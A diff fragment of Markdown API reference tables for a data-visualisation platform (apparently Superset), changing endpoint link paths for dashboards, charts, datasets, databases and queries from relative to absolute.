| `GET` | [Get a list of dashboards](/developer-docs/api/get-a-list-of-dashboards) | `/api/v1/dashboard/` |
|
||||
| `POST` | [Create a new dashboard](/developer-docs/api/create-a-new-dashboard) | `/api/v1/dashboard/` |
|
||||
| `GET` | [Get metadata information about this API resource (dashboard--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-dashboard-info) | `/api/v1/dashboard/_info` |
|
||||
| `GET` | [Get a dashboard detail information](/developer-docs/api/get-a-dashboard-detail-information) | `/api/v1/dashboard/{id_or_slug}` |
|
||||
| `GET` | [Get a dashboard's chart definitions.](/developer-docs/api/get-a-dashboard-s-chart-definitions) | `/api/v1/dashboard/{id_or_slug}/charts` |
|
||||
| `POST` | [Create a copy of an existing dashboard](/developer-docs/api/create-a-copy-of-an-existing-dashboard) | `/api/v1/dashboard/{id_or_slug}/copy/` |
|
||||
| `GET` | [Get dashboard's datasets](/developer-docs/api/get-dashboard-s-datasets) | `/api/v1/dashboard/{id_or_slug}/datasets` |
|
||||
| `DELETE` | [Delete a dashboard's embedded configuration](/developer-docs/api/delete-a-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `GET` | [Get the dashboard's embedded configuration](/developer-docs/api/get-the-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `POST` | [Set a dashboard's embedded configuration](/developer-docs/api/set-a-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `PUT` | [Update dashboard by id_or_slug embedded](/developer-docs/api/update-dashboard-by-id-or-slug-embedded) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `GET` | [Get dashboard's tabs](/developer-docs/api/get-dashboard-s-tabs) | `/api/v1/dashboard/{id_or_slug}/tabs` |
|
||||
| `DELETE` | [Delete a dashboard](/developer-docs/api/delete-a-dashboard) | `/api/v1/dashboard/{pk}` |
|
||||
| `PUT` | [Update a dashboard](/developer-docs/api/update-a-dashboard) | `/api/v1/dashboard/{pk}` |
|
||||
| `POST` | [Compute and cache a screenshot (dashboard-pk-cache-dashboard-screenshot)](/developer-docs/api/compute-and-cache-a-screenshot-dashboard-pk-cache-dashboard-screenshot) | `/api/v1/dashboard/{pk}/cache_dashboard_screenshot/` |
|
||||
| `PUT` | [Update colors configuration for a dashboard.](/developer-docs/api/update-colors-configuration-for-a-dashboard) | `/api/v1/dashboard/{pk}/colors` |
|
||||
| `DELETE` | [Remove the dashboard from the user favorite list](/developer-docs/api/remove-the-dashboard-from-the-user-favorite-list) | `/api/v1/dashboard/{pk}/favorites/` |
|
||||
| `POST` | [Mark the dashboard as favorite for the current user](/developer-docs/api/mark-the-dashboard-as-favorite-for-the-current-user) | `/api/v1/dashboard/{pk}/favorites/` |
|
||||
| `PUT` | [Update native filters configuration for a dashboard.](/developer-docs/api/update-native-filters-configuration-for-a-dashboard) | `/api/v1/dashboard/{pk}/filters` |
|
||||
| `GET` | [Get a computed screenshot from cache (dashboard-pk-screenshot-digest)](/developer-docs/api/get-a-computed-screenshot-from-cache-dashboard-pk-screenshot-digest) | `/api/v1/dashboard/{pk}/screenshot/{digest}/` |
|
||||
| `GET` | [Get dashboard's thumbnail](/developer-docs/api/get-dashboard-s-thumbnail) | `/api/v1/dashboard/{pk}/thumbnail/{digest}/` |
|
||||
| `GET` | [Download multiple dashboards as YAML files](/developer-docs/api/download-multiple-dashboards-as-yaml-files) | `/api/v1/dashboard/export/` |
|
||||
| `GET` | [Check favorited dashboards for current user](/developer-docs/api/check-favorited-dashboards-for-current-user) | `/api/v1/dashboard/favorite_status/` |
|
||||
| `POST` | [Import dashboard(s) with associated charts/datasets/databases](/developer-docs/api/import-dashboard-s-with-associated-charts-datasets-databases) | `/api/v1/dashboard/import/` |
|
||||
| `GET` | [Get related fields data (dashboard-related-column-name)](/developer-docs/api/get-related-fields-data-dashboard-related-column-name) | `/api/v1/dashboard/related/{column_name}` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -97,26 +97,26 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete charts](./api/bulk-delete-charts) | `/api/v1/chart/` |
|
||||
| `GET` | [Get a list of charts](./api/get-a-list-of-charts) | `/api/v1/chart/` |
|
||||
| `POST` | [Create a new chart](./api/create-a-new-chart) | `/api/v1/chart/` |
|
||||
| `GET` | [Get metadata information about this API resource (chart--info)](./api/get-metadata-information-about-this-api-resource-chart-info) | `/api/v1/chart/_info` |
|
||||
| `DELETE` | [Delete a chart](./api/delete-a-chart) | `/api/v1/chart/{pk}` |
|
||||
| `GET` | [Get a chart detail information](./api/get-a-chart-detail-information) | `/api/v1/chart/{pk}` |
|
||||
| `PUT` | [Update a chart](./api/update-a-chart) | `/api/v1/chart/{pk}` |
|
||||
| `GET` | [Compute and cache a screenshot (chart-pk-cache-screenshot)](./api/compute-and-cache-a-screenshot-chart-pk-cache-screenshot) | `/api/v1/chart/{pk}/cache_screenshot/` |
|
||||
| `GET` | [Return payload data response for a chart](./api/return-payload-data-response-for-a-chart) | `/api/v1/chart/{pk}/data/` |
|
||||
| `DELETE` | [Remove the chart from the user favorite list](./api/remove-the-chart-from-the-user-favorite-list) | `/api/v1/chart/{pk}/favorites/` |
|
||||
| `POST` | [Mark the chart as favorite for the current user](./api/mark-the-chart-as-favorite-for-the-current-user) | `/api/v1/chart/{pk}/favorites/` |
|
||||
| `GET` | [Get a computed screenshot from cache (chart-pk-screenshot-digest)](./api/get-a-computed-screenshot-from-cache-chart-pk-screenshot-digest) | `/api/v1/chart/{pk}/screenshot/{digest}/` |
|
||||
| `GET` | [Get chart thumbnail](./api/get-chart-thumbnail) | `/api/v1/chart/{pk}/thumbnail/{digest}/` |
|
||||
| `POST` | [Return payload data response for the given query (chart-data)](./api/return-payload-data-response-for-the-given-query-chart-data) | `/api/v1/chart/data` |
|
||||
| `GET` | [Return payload data response for the given query (chart-data-cache-key)](./api/return-payload-data-response-for-the-given-query-chart-data-cache-key) | `/api/v1/chart/data/{cache_key}` |
|
||||
| `GET` | [Download multiple charts as YAML files](./api/download-multiple-charts-as-yaml-files) | `/api/v1/chart/export/` |
|
||||
| `GET` | [Check favorited charts for current user](./api/check-favorited-charts-for-current-user) | `/api/v1/chart/favorite_status/` |
|
||||
| `POST` | [Import chart(s) with associated datasets and databases](./api/import-chart-s-with-associated-datasets-and-databases) | `/api/v1/chart/import/` |
|
||||
| `GET` | [Get related fields data (chart-related-column-name)](./api/get-related-fields-data-chart-related-column-name) | `/api/v1/chart/related/{column_name}` |
|
||||
| `PUT` | [Warm up the cache for the chart](./api/warm-up-the-cache-for-the-chart) | `/api/v1/chart/warm_up_cache` |
|
||||
| `DELETE` | [Bulk delete charts](/developer-docs/api/bulk-delete-charts) | `/api/v1/chart/` |
|
||||
| `GET` | [Get a list of charts](/developer-docs/api/get-a-list-of-charts) | `/api/v1/chart/` |
|
||||
| `POST` | [Create a new chart](/developer-docs/api/create-a-new-chart) | `/api/v1/chart/` |
|
||||
| `GET` | [Get metadata information about this API resource (chart--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-chart-info) | `/api/v1/chart/_info` |
|
||||
| `DELETE` | [Delete a chart](/developer-docs/api/delete-a-chart) | `/api/v1/chart/{pk}` |
|
||||
| `GET` | [Get a chart detail information](/developer-docs/api/get-a-chart-detail-information) | `/api/v1/chart/{pk}` |
|
||||
| `PUT` | [Update a chart](/developer-docs/api/update-a-chart) | `/api/v1/chart/{pk}` |
|
||||
| `GET` | [Compute and cache a screenshot (chart-pk-cache-screenshot)](/developer-docs/api/compute-and-cache-a-screenshot-chart-pk-cache-screenshot) | `/api/v1/chart/{pk}/cache_screenshot/` |
|
||||
| `GET` | [Return payload data response for a chart](/developer-docs/api/return-payload-data-response-for-a-chart) | `/api/v1/chart/{pk}/data/` |
|
||||
| `DELETE` | [Remove the chart from the user favorite list](/developer-docs/api/remove-the-chart-from-the-user-favorite-list) | `/api/v1/chart/{pk}/favorites/` |
|
||||
| `POST` | [Mark the chart as favorite for the current user](/developer-docs/api/mark-the-chart-as-favorite-for-the-current-user) | `/api/v1/chart/{pk}/favorites/` |
|
||||
| `GET` | [Get a computed screenshot from cache (chart-pk-screenshot-digest)](/developer-docs/api/get-a-computed-screenshot-from-cache-chart-pk-screenshot-digest) | `/api/v1/chart/{pk}/screenshot/{digest}/` |
|
||||
| `GET` | [Get chart thumbnail](/developer-docs/api/get-chart-thumbnail) | `/api/v1/chart/{pk}/thumbnail/{digest}/` |
|
||||
| `POST` | [Return payload data response for the given query (chart-data)](/developer-docs/api/return-payload-data-response-for-the-given-query-chart-data) | `/api/v1/chart/data` |
|
||||
| `GET` | [Return payload data response for the given query (chart-data-cache-key)](/developer-docs/api/return-payload-data-response-for-the-given-query-chart-data-cache-key) | `/api/v1/chart/data/{cache_key}` |
|
||||
| `GET` | [Download multiple charts as YAML files](/developer-docs/api/download-multiple-charts-as-yaml-files) | `/api/v1/chart/export/` |
|
||||
| `GET` | [Check favorited charts for current user](/developer-docs/api/check-favorited-charts-for-current-user) | `/api/v1/chart/favorite_status/` |
|
||||
| `POST` | [Import chart(s) with associated datasets and databases](/developer-docs/api/import-chart-s-with-associated-datasets-and-databases) | `/api/v1/chart/import/` |
|
||||
| `GET` | [Get related fields data (chart-related-column-name)](/developer-docs/api/get-related-fields-data-chart-related-column-name) | `/api/v1/chart/related/{column_name}` |
|
||||
| `PUT` | [Warm up the cache for the chart](/developer-docs/api/warm-up-the-cache-for-the-chart) | `/api/v1/chart/warm_up_cache` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -125,24 +125,24 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete datasets](./api/bulk-delete-datasets) | `/api/v1/dataset/` |
|
||||
| `GET` | [Get a list of datasets](./api/get-a-list-of-datasets) | `/api/v1/dataset/` |
|
||||
| `POST` | [Create a new dataset](./api/create-a-new-dataset) | `/api/v1/dataset/` |
|
||||
| `GET` | [Get metadata information about this API resource (dataset--info)](./api/get-metadata-information-about-this-api-resource-dataset-info) | `/api/v1/dataset/_info` |
|
||||
| `DELETE` | [Delete a dataset](./api/delete-a-dataset) | `/api/v1/dataset/{pk}` |
|
||||
| `GET` | [Get a dataset](./api/get-a-dataset) | `/api/v1/dataset/{pk}` |
|
||||
| `PUT` | [Update a dataset](./api/update-a-dataset) | `/api/v1/dataset/{pk}` |
|
||||
| `DELETE` | [Delete a dataset column](./api/delete-a-dataset-column) | `/api/v1/dataset/{pk}/column/{column_id}` |
|
||||
| `DELETE` | [Delete a dataset metric](./api/delete-a-dataset-metric) | `/api/v1/dataset/{pk}/metric/{metric_id}` |
|
||||
| `PUT` | [Refresh and update columns of a dataset](./api/refresh-and-update-columns-of-a-dataset) | `/api/v1/dataset/{pk}/refresh` |
|
||||
| `GET` | [Get charts and dashboards count associated to a dataset](./api/get-charts-and-dashboards-count-associated-to-a-dataset) | `/api/v1/dataset/{pk}/related_objects` |
|
||||
| `GET` | [Get distinct values from field data (dataset-distinct-column-name)](./api/get-distinct-values-from-field-data-dataset-distinct-column-name) | `/api/v1/dataset/distinct/{column_name}` |
|
||||
| `POST` | [Duplicate a dataset](./api/duplicate-a-dataset) | `/api/v1/dataset/duplicate` |
|
||||
| `GET` | [Download multiple datasets as YAML files](./api/download-multiple-datasets-as-yaml-files) | `/api/v1/dataset/export/` |
|
||||
| `POST` | [Retrieve a table by name, or create it if it does not exist](./api/retrieve-a-table-by-name-or-create-it-if-it-does-not-exist) | `/api/v1/dataset/get_or_create/` |
|
||||
| `POST` | [Import dataset(s) with associated databases](./api/import-dataset-s-with-associated-databases) | `/api/v1/dataset/import/` |
|
||||
| `GET` | [Get related fields data (dataset-related-column-name)](./api/get-related-fields-data-dataset-related-column-name) | `/api/v1/dataset/related/{column_name}` |
|
||||
| `PUT` | [Warm up the cache for each chart powered by the given table](./api/warm-up-the-cache-for-each-chart-powered-by-the-given-table) | `/api/v1/dataset/warm_up_cache` |
|
||||
| `DELETE` | [Bulk delete datasets](/developer-docs/api/bulk-delete-datasets) | `/api/v1/dataset/` |
|
||||
| `GET` | [Get a list of datasets](/developer-docs/api/get-a-list-of-datasets) | `/api/v1/dataset/` |
|
||||
| `POST` | [Create a new dataset](/developer-docs/api/create-a-new-dataset) | `/api/v1/dataset/` |
|
||||
| `GET` | [Get metadata information about this API resource (dataset--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-dataset-info) | `/api/v1/dataset/_info` |
|
||||
| `DELETE` | [Delete a dataset](/developer-docs/api/delete-a-dataset) | `/api/v1/dataset/{pk}` |
|
||||
| `GET` | [Get a dataset](/developer-docs/api/get-a-dataset) | `/api/v1/dataset/{pk}` |
|
||||
| `PUT` | [Update a dataset](/developer-docs/api/update-a-dataset) | `/api/v1/dataset/{pk}` |
|
||||
| `DELETE` | [Delete a dataset column](/developer-docs/api/delete-a-dataset-column) | `/api/v1/dataset/{pk}/column/{column_id}` |
|
||||
| `DELETE` | [Delete a dataset metric](/developer-docs/api/delete-a-dataset-metric) | `/api/v1/dataset/{pk}/metric/{metric_id}` |
|
||||
| `PUT` | [Refresh and update columns of a dataset](/developer-docs/api/refresh-and-update-columns-of-a-dataset) | `/api/v1/dataset/{pk}/refresh` |
|
||||
| `GET` | [Get charts and dashboards count associated to a dataset](/developer-docs/api/get-charts-and-dashboards-count-associated-to-a-dataset) | `/api/v1/dataset/{pk}/related_objects` |
|
||||
| `GET` | [Get distinct values from field data (dataset-distinct-column-name)](/developer-docs/api/get-distinct-values-from-field-data-dataset-distinct-column-name) | `/api/v1/dataset/distinct/{column_name}` |
|
||||
| `POST` | [Duplicate a dataset](/developer-docs/api/duplicate-a-dataset) | `/api/v1/dataset/duplicate` |
|
||||
| `GET` | [Download multiple datasets as YAML files](/developer-docs/api/download-multiple-datasets-as-yaml-files) | `/api/v1/dataset/export/` |
|
||||
| `POST` | [Retrieve a table by name, or create it if it does not exist](/developer-docs/api/retrieve-a-table-by-name-or-create-it-if-it-does-not-exist) | `/api/v1/dataset/get_or_create/` |
|
||||
| `POST` | [Import dataset(s) with associated databases](/developer-docs/api/import-dataset-s-with-associated-databases) | `/api/v1/dataset/import/` |
|
||||
| `GET` | [Get related fields data (dataset-related-column-name)](/developer-docs/api/get-related-fields-data-dataset-related-column-name) | `/api/v1/dataset/related/{column_name}` |
|
||||
| `PUT` | [Warm up the cache for each chart powered by the given table](/developer-docs/api/warm-up-the-cache-for-each-chart-powered-by-the-given-table) | `/api/v1/dataset/warm_up_cache` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -151,37 +151,37 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get a list of databases](./api/get-a-list-of-databases) | `/api/v1/database/` |
|
||||
| `POST` | [Create a new database](./api/create-a-new-database) | `/api/v1/database/` |
|
||||
| `GET` | [Get metadata information about this API resource (database--info)](./api/get-metadata-information-about-this-api-resource-database-info) | `/api/v1/database/_info` |
|
||||
| `DELETE` | [Delete a database](./api/delete-a-database) | `/api/v1/database/{pk}` |
|
||||
| `GET` | [Get a database](./api/get-a-database) | `/api/v1/database/{pk}` |
|
||||
| `PUT` | [Change a database](./api/change-a-database) | `/api/v1/database/{pk}` |
|
||||
| `GET` | [Get all catalogs from a database](./api/get-all-catalogs-from-a-database) | `/api/v1/database/{pk}/catalogs/` |
|
||||
| `GET` | [Get a database connection info](./api/get-a-database-connection-info) | `/api/v1/database/{pk}/connection` |
|
||||
| `GET` | [Get function names supported by a database](./api/get-function-names-supported-by-a-database) | `/api/v1/database/{pk}/function_names/` |
|
||||
| `GET` | [Get charts and dashboards count associated to a database](./api/get-charts-and-dashboards-count-associated-to-a-database) | `/api/v1/database/{pk}/related_objects/` |
|
||||
| `GET` | [The list of the database schemas where to upload information](./api/the-list-of-the-database-schemas-where-to-upload-information) | `/api/v1/database/{pk}/schemas_access_for_file_upload/` |
|
||||
| `GET` | [Get all schemas from a database](./api/get-all-schemas-from-a-database) | `/api/v1/database/{pk}/schemas/` |
|
||||
| `GET` | [Get database select star for table (database-pk-select-star-table-name)](./api/get-database-select-star-for-table-database-pk-select-star-table-name) | `/api/v1/database/{pk}/select_star/{table_name}/` |
|
||||
| `GET` | [Get database select star for table (database-pk-select-star-table-name-schema-name)](./api/get-database-select-star-for-table-database-pk-select-star-table-name-schema-name) | `/api/v1/database/{pk}/select_star/{table_name}/{schema_name}/` |
|
||||
| `DELETE` | [Delete a SSH tunnel](./api/delete-a-ssh-tunnel) | `/api/v1/database/{pk}/ssh_tunnel/` |
|
||||
| `POST` | [Re-sync all permissions for a database connection](./api/re-sync-all-permissions-for-a-database-connection) | `/api/v1/database/{pk}/sync_permissions/` |
|
||||
| `GET` | [Get table extra metadata (database-pk-table-extra-table-name-schema-name)](./api/get-table-extra-metadata-database-pk-table-extra-table-name-schema-name) | `/api/v1/database/{pk}/table_extra/{table_name}/{schema_name}/` |
|
||||
| `GET` | [Get table metadata](./api/get-table-metadata) | `/api/v1/database/{pk}/table_metadata/` |
|
||||
| `GET` | [Get table extra metadata (database-pk-table-metadata-extra)](./api/get-table-extra-metadata-database-pk-table-metadata-extra) | `/api/v1/database/{pk}/table_metadata/extra/` |
|
||||
| `GET` | [Get database table metadata](./api/get-database-table-metadata) | `/api/v1/database/{pk}/table/{table_name}/{schema_name}/` |
|
||||
| `GET` | [Get a list of tables for given database](./api/get-a-list-of-tables-for-given-database) | `/api/v1/database/{pk}/tables/` |
|
||||
| `POST` | [Upload a file to a database table](./api/upload-a-file-to-a-database-table) | `/api/v1/database/{pk}/upload/` |
|
||||
| `POST` | [Validate arbitrary SQL](./api/validate-arbitrary-sql) | `/api/v1/database/{pk}/validate_sql/` |
|
||||
| `GET` | [Get names of databases currently available](./api/get-names-of-databases-currently-available) | `/api/v1/database/available/` |
|
||||
| `GET` | [Download database(s) and associated dataset(s) as a zip file](./api/download-database-s-and-associated-dataset-s-as-a-zip-file) | `/api/v1/database/export/` |
|
||||
| `POST` | [Import database(s) with associated datasets](./api/import-database-s-with-associated-datasets) | `/api/v1/database/import/` |
|
||||
| `GET` | [Receive personal access tokens from OAuth2](./api/receive-personal-access-tokens-from-oauth2) | `/api/v1/database/oauth2/` |
|
||||
| `GET` | [Get related fields data (database-related-column-name)](./api/get-related-fields-data-database-related-column-name) | `/api/v1/database/related/{column_name}` |
|
||||
| `POST` | [Test a database connection](./api/test-a-database-connection) | `/api/v1/database/test_connection/` |
|
||||
| `POST` | [Upload a file and returns file metadata](./api/upload-a-file-and-returns-file-metadata) | `/api/v1/database/upload_metadata/` |
|
||||
| `POST` | [Validate database connection parameters](./api/validate-database-connection-parameters) | `/api/v1/database/validate_parameters/` |
|
||||
| `GET` | [Get a list of databases](/developer-docs/api/get-a-list-of-databases) | `/api/v1/database/` |
|
||||
| `POST` | [Create a new database](/developer-docs/api/create-a-new-database) | `/api/v1/database/` |
|
||||
| `GET` | [Get metadata information about this API resource (database--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-database-info) | `/api/v1/database/_info` |
|
||||
| `DELETE` | [Delete a database](/developer-docs/api/delete-a-database) | `/api/v1/database/{pk}` |
|
||||
| `GET` | [Get a database](/developer-docs/api/get-a-database) | `/api/v1/database/{pk}` |
|
||||
| `PUT` | [Change a database](/developer-docs/api/change-a-database) | `/api/v1/database/{pk}` |
|
||||
| `GET` | [Get all catalogs from a database](/developer-docs/api/get-all-catalogs-from-a-database) | `/api/v1/database/{pk}/catalogs/` |
|
||||
| `GET` | [Get a database connection info](/developer-docs/api/get-a-database-connection-info) | `/api/v1/database/{pk}/connection` |
|
||||
| `GET` | [Get function names supported by a database](/developer-docs/api/get-function-names-supported-by-a-database) | `/api/v1/database/{pk}/function_names/` |
|
||||
| `GET` | [Get charts and dashboards count associated to a database](/developer-docs/api/get-charts-and-dashboards-count-associated-to-a-database) | `/api/v1/database/{pk}/related_objects/` |
|
||||
| `GET` | [The list of the database schemas where to upload information](/developer-docs/api/the-list-of-the-database-schemas-where-to-upload-information) | `/api/v1/database/{pk}/schemas_access_for_file_upload/` |
|
||||
| `GET` | [Get all schemas from a database](/developer-docs/api/get-all-schemas-from-a-database) | `/api/v1/database/{pk}/schemas/` |
|
||||
| `GET` | [Get database select star for table (database-pk-select-star-table-name)](/developer-docs/api/get-database-select-star-for-table-database-pk-select-star-table-name) | `/api/v1/database/{pk}/select_star/{table_name}/` |
|
||||
| `GET` | [Get database select star for table (database-pk-select-star-table-name-schema-name)](/developer-docs/api/get-database-select-star-for-table-database-pk-select-star-table-name-schema-name) | `/api/v1/database/{pk}/select_star/{table_name}/{schema_name}/` |
|
||||
| `DELETE` | [Delete a SSH tunnel](/developer-docs/api/delete-a-ssh-tunnel) | `/api/v1/database/{pk}/ssh_tunnel/` |
|
||||
| `POST` | [Re-sync all permissions for a database connection](/developer-docs/api/re-sync-all-permissions-for-a-database-connection) | `/api/v1/database/{pk}/sync_permissions/` |
|
||||
| `GET` | [Get table extra metadata (database-pk-table-extra-table-name-schema-name)](/developer-docs/api/get-table-extra-metadata-database-pk-table-extra-table-name-schema-name) | `/api/v1/database/{pk}/table_extra/{table_name}/{schema_name}/` |
|
||||
| `GET` | [Get table metadata](/developer-docs/api/get-table-metadata) | `/api/v1/database/{pk}/table_metadata/` |
|
||||
| `GET` | [Get table extra metadata (database-pk-table-metadata-extra)](/developer-docs/api/get-table-extra-metadata-database-pk-table-metadata-extra) | `/api/v1/database/{pk}/table_metadata/extra/` |
|
||||
| `GET` | [Get database table metadata](/developer-docs/api/get-database-table-metadata) | `/api/v1/database/{pk}/table/{table_name}/{schema_name}/` |
|
||||
| `GET` | [Get a list of tables for given database](/developer-docs/api/get-a-list-of-tables-for-given-database) | `/api/v1/database/{pk}/tables/` |
|
||||
| `POST` | [Upload a file to a database table](/developer-docs/api/upload-a-file-to-a-database-table) | `/api/v1/database/{pk}/upload/` |
|
||||
| `POST` | [Validate arbitrary SQL](/developer-docs/api/validate-arbitrary-sql) | `/api/v1/database/{pk}/validate_sql/` |
|
||||
| `GET` | [Get names of databases currently available](/developer-docs/api/get-names-of-databases-currently-available) | `/api/v1/database/available/` |
|
||||
| `GET` | [Download database(s) and associated dataset(s) as a zip file](/developer-docs/api/download-database-s-and-associated-dataset-s-as-a-zip-file) | `/api/v1/database/export/` |
|
||||
| `POST` | [Import database(s) with associated datasets](/developer-docs/api/import-database-s-with-associated-datasets) | `/api/v1/database/import/` |
|
||||
| `GET` | [Receive personal access tokens from OAuth2](/developer-docs/api/receive-personal-access-tokens-from-oauth2) | `/api/v1/database/oauth2/` |
|
||||
| `GET` | [Get related fields data (database-related-column-name)](/developer-docs/api/get-related-fields-data-database-related-column-name) | `/api/v1/database/related/{column_name}` |
|
||||
| `POST` | [Test a database connection](/developer-docs/api/test-a-database-connection) | `/api/v1/database/test_connection/` |
|
||||
| `POST` | [Upload a file and returns file metadata](/developer-docs/api/upload-a-file-and-returns-file-metadata) | `/api/v1/database/upload_metadata/` |
|
||||
| `POST` | [Validate database connection parameters](/developer-docs/api/validate-database-connection-parameters) | `/api/v1/database/validate_parameters/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -192,7 +192,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Assemble Explore related information in a single endpoint](./api/assemble-explore-related-information-in-a-single-endpoint) | `/api/v1/explore/` |
|
||||
| `GET` | [Assemble Explore related information in a single endpoint](/developer-docs/api/assemble-explore-related-information-in-a-single-endpoint) | `/api/v1/explore/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -201,12 +201,12 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get the bootstrap data for SqlLab page](./api/get-the-bootstrap-data-for-sqllab-page) | `/api/v1/sqllab/` |
|
||||
| `POST` | [Estimate the SQL query execution cost](./api/estimate-the-sql-query-execution-cost) | `/api/v1/sqllab/estimate/` |
|
||||
| `POST` | [Execute a SQL query](./api/execute-a-sql-query) | `/api/v1/sqllab/execute/` |
|
||||
| `GET` | [Export the SQL query results to a CSV](./api/export-the-sql-query-results-to-a-csv) | `/api/v1/sqllab/export/{client_id}/` |
|
||||
| `POST` | [Format SQL code](./api/format-sql-code) | `/api/v1/sqllab/format_sql/` |
|
||||
| `GET` | [Get the result of a SQL query execution](./api/get-the-result-of-a-sql-query-execution) | `/api/v1/sqllab/results/` |
|
||||
| `GET` | [Get the bootstrap data for SqlLab page](/developer-docs/api/get-the-bootstrap-data-for-sqllab-page) | `/api/v1/sqllab/` |
|
||||
| `POST` | [Estimate the SQL query execution cost](/developer-docs/api/estimate-the-sql-query-execution-cost) | `/api/v1/sqllab/estimate/` |
|
||||
| `POST` | [Execute a SQL query](/developer-docs/api/execute-a-sql-query) | `/api/v1/sqllab/execute/` |
|
||||
| `GET` | [Export the SQL query results to a CSV](/developer-docs/api/export-the-sql-query-results-to-a-csv) | `/api/v1/sqllab/export/{client_id}/` |
|
||||
| `POST` | [Format SQL code](/developer-docs/api/format-sql-code) | `/api/v1/sqllab/format_sql/` |
|
||||
| `GET` | [Get the result of a SQL query execution](/developer-docs/api/get-the-result-of-a-sql-query-execution) | `/api/v1/sqllab/results/` |
|
||||
|
||||
</details>
|
||||
|
||||
@@ -215,23 +215,23 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get a list of queries](./api/get-a-list-of-queries) | `/api/v1/query/` |
|
||||
| `GET` | [Get query detail information](./api/get-query-detail-information) | `/api/v1/query/{pk}` |
|
||||
| `GET` | [Get distinct values from field data (query-distinct-column-name)](./api/get-distinct-values-from-field-data-query-distinct-column-name) | `/api/v1/query/distinct/{column_name}` |
|
||||
| `GET` | [Get related fields data (query-related-column-name)](./api/get-related-fields-data-query-related-column-name) | `/api/v1/query/related/{column_name}` |
|
||||
| `POST` | [Manually stop a query with client_id](./api/manually-stop-a-query-with-client-id) | `/api/v1/query/stop` |
|
||||
| `GET` | [Get a list of queries that changed after last_updated_ms](./api/get-a-list-of-queries-that-changed-after-last-updated-ms) | `/api/v1/query/updated_since` |
|
||||
| `DELETE` | [Bulk delete saved queries](./api/bulk-delete-saved-queries) | `/api/v1/saved_query/` |
|
||||
| `GET` | [Get a list of saved queries](./api/get-a-list-of-saved-queries) | `/api/v1/saved_query/` |
|
||||
| `POST` | [Create a saved query](./api/create-a-saved-query) | `/api/v1/saved_query/` |
|
||||
| `GET` | [Get metadata information about this API resource (saved-query--info)](./api/get-metadata-information-about-this-api-resource-saved-query-info) | `/api/v1/saved_query/_info` |
|
||||
| `DELETE` | [Delete a saved query](./api/delete-a-saved-query) | `/api/v1/saved_query/{pk}` |
|
||||
| `GET` | [Get a saved query](./api/get-a-saved-query) | `/api/v1/saved_query/{pk}` |
|
||||
| `PUT` | [Update a saved query](./api/update-a-saved-query) | `/api/v1/saved_query/{pk}` |
|
||||
| `GET` | [Get distinct values from field data (saved-query-distinct-column-name)](./api/get-distinct-values-from-field-data-saved-query-distinct-column-name) | `/api/v1/saved_query/distinct/{column_name}` |
|
||||
| `GET` | [Download multiple saved queries as YAML files](./api/download-multiple-saved-queries-as-yaml-files) | `/api/v1/saved_query/export/` |
|
||||
| `POST` | [Import saved queries with associated databases](./api/import-saved-queries-with-associated-databases) | `/api/v1/saved_query/import/` |
|
||||
| `GET` | [Get related fields data (saved-query-related-column-name)](./api/get-related-fields-data-saved-query-related-column-name) | `/api/v1/saved_query/related/{column_name}` |
|
||||
| `GET` | [Get a list of queries](/developer-docs/api/get-a-list-of-queries) | `/api/v1/query/` |
|
||||
| `GET` | [Get query detail information](/developer-docs/api/get-query-detail-information) | `/api/v1/query/{pk}` |
|
||||
| `GET` | [Get distinct values from field data (query-distinct-column-name)](/developer-docs/api/get-distinct-values-from-field-data-query-distinct-column-name) | `/api/v1/query/distinct/{column_name}` |
|
||||
| `GET` | [Get related fields data (query-related-column-name)](/developer-docs/api/get-related-fields-data-query-related-column-name) | `/api/v1/query/related/{column_name}` |
|
||||
| `POST` | [Manually stop a query with client_id](/developer-docs/api/manually-stop-a-query-with-client-id) | `/api/v1/query/stop` |
|
||||
| `GET` | [Get a list of queries that changed after last_updated_ms](/developer-docs/api/get-a-list-of-queries-that-changed-after-last-updated-ms) | `/api/v1/query/updated_since` |
|
||||
| `DELETE` | [Bulk delete saved queries](/developer-docs/api/bulk-delete-saved-queries) | `/api/v1/saved_query/` |
|
||||
| `GET` | [Get a list of saved queries](/developer-docs/api/get-a-list-of-saved-queries) | `/api/v1/saved_query/` |
|
||||
| `POST` | [Create a saved query](/developer-docs/api/create-a-saved-query) | `/api/v1/saved_query/` |
|
||||
| `GET` | [Get metadata information about this API resource (saved-query--info)](/developer-docs/api/get-metadata-information-about-this-api-resource-saved-query-info) | `/api/v1/saved_query/_info` |
|
||||
| `DELETE` | [Delete a saved query](/developer-docs/api/delete-a-saved-query) | `/api/v1/saved_query/{pk}` |
|
||||
| `GET` | [Get a saved query](/developer-docs/api/get-a-saved-query) | `/api/v1/saved_query/{pk}` |
|
||||
